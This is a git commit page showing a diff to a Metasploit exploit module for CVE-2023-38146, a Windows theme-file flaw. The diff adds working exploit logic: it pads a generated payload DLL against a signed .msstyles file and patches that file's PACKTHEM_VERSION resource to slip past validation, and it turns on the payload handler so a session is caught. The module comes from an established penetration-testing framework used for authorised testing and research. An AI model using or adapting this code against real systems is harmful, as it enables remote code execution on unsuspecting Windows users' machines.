Bring in zerosteiner's PACKME_VERSION edit

This commit is contained in:
bwatters 2023-12-20 16:46:44 -06:00
commit 7fafab9680
No known key found for this signature in database
GPG Key ID: ECC0F0A52E65F268
1 changed files with 11 additions and 7 deletions


@ -21,7 +21,8 @@ class MetasploitModule < Msf::Exploit::Remote
'DisclosureDate' => '2023-09-13', 'DisclosureDate' => '2023-09-13',
'Author' => [ 'Author' => [
'gabe_k', # Discovery/PoC 'gabe_k', # Discovery/PoC
'bwatters-r7' # msf exploit 'bwatters-r7', # msf exploit
'Spencer McIntyre' # msf exploit
], ],
'References' => [ 'References' => [
['CVE', '2023-38146'], ['CVE', '2023-38146'],
@ -39,15 +40,15 @@ class MetasploitModule < Msf::Exploit::Remote
'Stability' => [CRASH_SAFE], 'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION], 'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [ARTIFACTS_ON_DISK, SCREEN_EFFECTS] 'SideEffects' => [ARTIFACTS_ON_DISK, SCREEN_EFFECTS]
} },
'DefaultOptions' => { 'DisablePayloadHandler' => false }
) )
) )
register_options([ register_options([
OptPath.new('STYLE_FILE', [ true, 'The Microsoft-signed .msstyles file (e.g. aero.msstyles).', '' ], regex: /.*\w*\.msstyles$/),
OptString.new('STYLE_FILE_NAME', [ true, 'The name of the style file to reference.', '' ], regex: /^\w*(\.msstyles)?$/), OptString.new('STYLE_FILE_NAME', [ true, 'The name of the style file to reference.', '' ], regex: /^\w*(\.msstyles)?$/),
OptString.new('THEME_FILE_NAME', [ true, 'The name of the theme file to generate.', 'exploit.theme' ]), OptString.new('THEME_FILE_NAME', [ true, 'The name of the theme file to generate.', 'exploit.theme' ])
OptPath.new('MS_SIGNED_DLL', [true, 'Signed Microsoft DLL to use for passing validation']),
OptPath.new('MS_VERSION_FILE', [true, 'Signed Microsoft DLL to use for passing validation'])
]) ])
deregister_options( deregister_options(
@ -69,7 +70,7 @@ class MetasploitModule < Msf::Exploit::Remote
end end
def primer def primer
legit_dll = File.binread(datastore['MS_SIGNED_DLL']) legit_dll = File.binread(datastore['STYLE_FILE'])
payload_dll = generate_payload_dll payload_dll = generate_payload_dll
max_length = [payload_dll.length, legit_dll.length].max max_length = [payload_dll.length, legit_dll.length].max
# make sure that the lengths are the same by padding the smaller to the length of the larger # make sure that the lengths are the same by padding the smaller to the length of the larger
@ -99,7 +100,10 @@ class MetasploitModule < Msf::Exploit::Remote
def get_file_contents(client:) def get_file_contents(client:)
print_status("Sending file to #{client.peerhost}") print_status("Sending file to #{client.peerhost}")
File.binread(datastore['MS_VERSION_FILE']) pe_raw = File.binread(datastore['STYLE_FILE'])
pe = Rex::PeParsey::Pe.new_from_string(pe_raw)
version_offset = pe.rva_to_file_offset(pe.resources['/PACKTHEM_VERSION/0/0'].rva)
pe_raw[0...version_offset] + [999].pack('v') + pe_raw[(version_offset + 2)...]
end end
def make_theme def make_theme